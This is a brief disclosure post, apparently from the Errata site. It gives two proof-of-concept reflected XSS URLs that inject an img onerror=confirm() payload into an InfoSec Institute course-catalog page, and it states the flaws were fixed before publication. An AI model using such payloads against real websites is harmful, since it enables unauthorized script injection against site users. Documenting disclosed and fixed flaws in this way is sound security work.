XSS in InfoSec Institute

2013-03-21

Rafay Baloch

[The below XSS POCs were submitted to Errata by Rafay. Rafay disclosed the issues to InfoSecInstitute, who fixed them prior to publishing this post. For more information on InfoSec Institute (ISI), see their charlatan page!]

POC:
http://mail.infosecinstitute.com/request_course_catalog.html?courseid=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E
http://mail.infosecinstitute.com/request_course_catalog.html?date=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E


main page ATTRITION feedback